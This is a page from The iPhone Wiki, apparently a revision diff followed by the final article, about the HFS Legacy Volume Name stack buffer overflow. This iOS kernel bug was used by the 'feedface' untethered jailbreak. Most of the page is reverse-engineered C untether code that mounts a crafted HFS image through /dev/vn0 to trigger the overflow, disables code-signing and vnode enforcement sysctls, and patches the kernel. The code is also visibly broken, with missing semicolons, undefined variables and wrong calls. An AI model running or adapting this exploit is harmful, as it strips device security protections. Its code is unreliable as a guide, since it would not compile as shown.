The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information.

Difference between revisions of "HFS Legacy Volume Name Stack Buffer Overflow"

From The iPhone Wiki
Jump to: navigation, search
(Sources for information: technical info of HFS name exploit)
(Better formatting. If anyone could please seperate vm_prep and main, that would be awesome.)
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
The '''HFS Legacy Volume Name Stack Buffer Overflow''' is a [[kernel]] vulnerability used to achieve an [[untethered jailbreak]]. Its exploit implementation, dubbed "feedface,"[https://twitter.com/pod2g/status/33997326070583296] was used in conjunction with limera1n's [[bootrom]] exploit or the [[usb_control_msg(0xA1, 1) Exploit]] in [[greenpois0n (jailbreak)|greenpois0n]].
  
The '''HFS Legacy Volume Name Stack Buffer Overflow''' is a [[kernel]] vulnerability used to achieve an [[untethered jailbreak]]. Its exploit implementation, dubbed "feedface,"[https://twitter.com/pod2g/status/33997326070583296] was used in conjunction with limera1n's [[bootrom]] exploit or the [[usb_control_msg(0xA1, 1) Exploit]] in [[greenpois0n (jailbreak)|greenpois0n]].
  +
  +
== Exploiting the Kernel Bug ==
  +
  +
This stack buffer overflow relies on the hfs_mdb file in feedface, when the untether is ran it uses hfs_mdb
  +
to take control of PC register and do basically whatever you want, in that case, they used a function called
  +
real_payload() that patched the kernel and patched the sandbox. After some reverse engineering, here's what
  +
the untether looked like.
  +
  +
int mnt_our_hfs()
  +
{
  +
struct hfs_mount_args i;
  +
bzero(i, sizeof(i));
  +
i.fspec = (int)"/dev/vn0";
  +
i.hfs_uid = args.hfs_gid = 99;
  +
i.hfs_mask = 0x1C5;
  +
puts("[+]Triggering the kernel exploit");
  +
mount("hfs", "mnt/", MNT_RDONLY, i);
  +
return puts("[+] Payload was successful");
  +
}
  +
  +
int prep_vn()
  +
{
  +
vn_ioctl vn;
  +
int i = open("/dev/vn0", O_RDONLY, 0);
  +
if(i < 0){
  +
puts("[-]Can't open /dev/vn0");
  +
exit(1);
  +
}
  +
ioctl(i, VNIOCDETACH, &vn);
  +
vn.vn_file = (int)"/usr/lib/hfs_mdb";
  +
vn.vn_control = vncontrol_readwrite_io_e;
  +
if(ioctl(i, VNIOCATTACH, &vn) < 0)
  +
{
  +
puts("[-]Coudn't attach to /dev/vn0")''
  +
close(i);
  +
exit(1);
  +
}
  +
return close(1);
  +
}
  +
  +
int main(int argc, char const *argv[])
  +
{
  +
int result;
  +
struct stat i;
  +
uint32_t zero = 0, one = 1;
  +
sysctlbyname("security.mac.vnode_enforce", 0, 0, &zero, sizeof(uint32_t));
  +
sysctlbyname("vm.cs_validation", 0, 0, &zero, sizeof(uint32_t))
  +
prep_vn();
  +
i.st_uid = 0;
  +
i.st_gid = 0;
  +
i.st_rdev = 0;
  +
i.st_atimespec.tv_nsec = 0;
  +
i.st_atimespec.tv_sec = 0;
  +
i.st_mtimespec.tv_nsec = 0;
  +
i.st_mtimespec.tv_sec = 0;
  +
i.st_ctimespec.tv_sec = 0;
  +
i.st_dev = (dev_t)"/dev/vn0";
  +
i.st_ino = 99;
  +
i.st_uid = 453;
  +
puts("[+]Trigger kernel exploit");
  +
mnt_our_hfs();
  +
sysctlbyname("security.mac.vnode_enforce", 0, 0, &one, sizeof(uint32_t));
  +
patch_kernel();
  +
return 0;
  +
}
   
 
== Credit ==
  
== Credit ==
Line 6: Line 71:
 
== Sources for information ==
  
== Sources for information ==
 
*[http://www.twitlonger.com/show/8jep67 TwitLonger]
  
*[http://www.twitlonger.com/show/8jep67 TwitLonger]
*http://pastie.org/2060071 (from a [http://twitter.com/#!/0naj/status/80211549427482624 Tweet] by [[User:jan0|@0naj]])
 +
*http://pastie.org/2060071 (from a [https://twitter.com/0naj/status/80211549427482624 tweet] by [[User:jan0|jan0]])
  +
*[http://www.slideshare.net/i0n1c/blackhat-usa-2011-stefan-esser-ios-kernel-exploitation BlackHat Presentation by [[I0n1c]]] (starting at slide 24)
   
 
[[Category:Exploits]]
  
[[Category:Exploits]]

Latest revision as of 14:21, 28 March 2015

The HFS Legacy Volume Name Stack Buffer Overflow is a kernel vulnerability used to achieve an untethered jailbreak. Its exploit implementation, dubbed "feedface,"[1] was used in conjunction with limera1n's bootrom exploit or the usb_control_msg(0xA1, 1) Exploit in greenpois0n.

Exploiting the Kernel Bug

This stack buffer overflow relies on the hfs_mdb file in feedface, when the untether is ran it uses hfs_mdb to take control of PC register and do basically whatever you want, in that case, they used a function called real_payload() that patched the kernel and patched the sandbox. After some reverse engineering, here's what the untether looked like. 

 int mnt_our_hfs()
 {
  struct hfs_mount_args i;
  bzero(i, sizeof(i));
  i.fspec = (int)"/dev/vn0";
  i.hfs_uid = args.hfs_gid = 99;
  i.hfs_mask = 0x1C5;
  puts("[+]Triggering the kernel exploit");
  mount("hfs", "mnt/", MNT_RDONLY, i);
  return puts("[+] Payload was successful");
 }

 int prep_vn()
 {
  vn_ioctl vn;
  int i = open("/dev/vn0", O_RDONLY, 0);
  if(i < 0){
     puts("[-]Can't open /dev/vn0");
     exit(1);
  }
  ioctl(i, VNIOCDETACH, &vn);
  vn.vn_file = (int)"/usr/lib/hfs_mdb";
  vn.vn_control = vncontrol_readwrite_io_e;
  if(ioctl(i, VNIOCATTACH, &vn) < 0)
  {
     puts("[-]Coudn't attach to /dev/vn0")
     close(i);
     exit(1);
  }
  return close(1);
 }
 
 int main(int argc, char const *argv[])
 {
  int result;
  struct stat i;
  uint32_t zero = 0, one = 1;
  sysctlbyname("security.mac.vnode_enforce", 0, 0, &zero, sizeof(uint32_t));
  sysctlbyname("vm.cs_validation", 0, 0, &zero, sizeof(uint32_t))
  prep_vn();
  i.st_uid = 0;
  i.st_gid = 0;
  i.st_rdev = 0;
  i.st_atimespec.tv_nsec = 0;
  i.st_atimespec.tv_sec = 0;
  i.st_mtimespec.tv_nsec = 0;
  i.st_mtimespec.tv_sec = 0;
  i.st_ctimespec.tv_sec = 0;
  i.st_dev = (dev_t)"/dev/vn0";
  i.st_ino = 99;
  i.st_uid = 453;
  puts("[+]Trigger kernel exploit");
  mnt_our_hfs();
  sysctlbyname("security.mac.vnode_enforce", 0, 0, &one, sizeof(uint32_t));
  patch_kernel();
  return 0;
  }

Credit

jan0, pod2g, Posixninja

Sources for information

Retrieved from "https://www.theiphonewiki.com/w/index.php?title=HFS_Legacy_Volume_Name_Stack_Buffer_Overflow&oldid=45236"